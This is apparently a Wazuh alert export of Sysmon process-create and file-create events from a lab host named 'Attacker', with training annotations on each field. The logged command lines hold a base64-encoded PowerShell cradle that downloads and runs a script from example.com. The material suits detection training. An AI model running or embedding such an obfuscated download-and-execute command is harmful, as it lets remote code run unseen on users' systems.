UtcTime: 2025-04-24 22:40:06.664
ProcessGuid: {94294ddc-bdc5-680a-c20b-000000000e00}
ProcessId: 16460
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mpyc2gxe.upa.ps1
CreationUtcTime: 2025-04-24 22:40:06.664
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:06.664 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdc5-680a-c20b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16460 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mpyc2gxe.upa.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:06.664 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 102 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534411.1993365 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:08.9554346Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285771 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:07.867
ProcessGuid: {94294ddc-bdc7-680a-c40b-000000000e00}
ProcessId: 16560
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdc5-680a-c20b-000000000e00}
ParentProcessId: 16460
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:07.867 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdc7-680a-c40b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16560 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdc5-680a-c20b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16460 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 106 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534411.2001436 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:09.1484914Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285772 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:09.120
ProcessGuid: {94294ddc-bdc7-680a-c40b-000000000e00}
ProcessId: 16560
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_f5a3xdyh.wwv.ps1
CreationUtcTime: 2025-04-24 22:40:09.120
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:09.120 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdc7-680a-c40b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16560 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_f5a3xdyh.wwv.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:09.120 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 103 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534413.2004205 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:11.7337351Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285800 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:10.418
ProcessGuid: {94294ddc-bdca-680a-c70b-000000000e00}
ProcessId: 16772
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdc7-680a-c40b-000000000e00}
ParentProcessId: 16560
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:10.418 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdca-680a-c70b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdc7-680a-c40b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16560 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 107 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534414.2012276 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:11.9674782Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285801 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:11.949
ProcessGuid: {94294ddc-bdca-680a-c70b-000000000e00}
ProcessId: 16772
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_2glcj434.zx1.ps1
CreationUtcTime: 2025-04-24 22:40:11.949
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:11.949 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdca-680a-c70b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_2glcj434.zx1.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:11.949 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 108 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534417.2015045 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:15.1527371Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285824 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
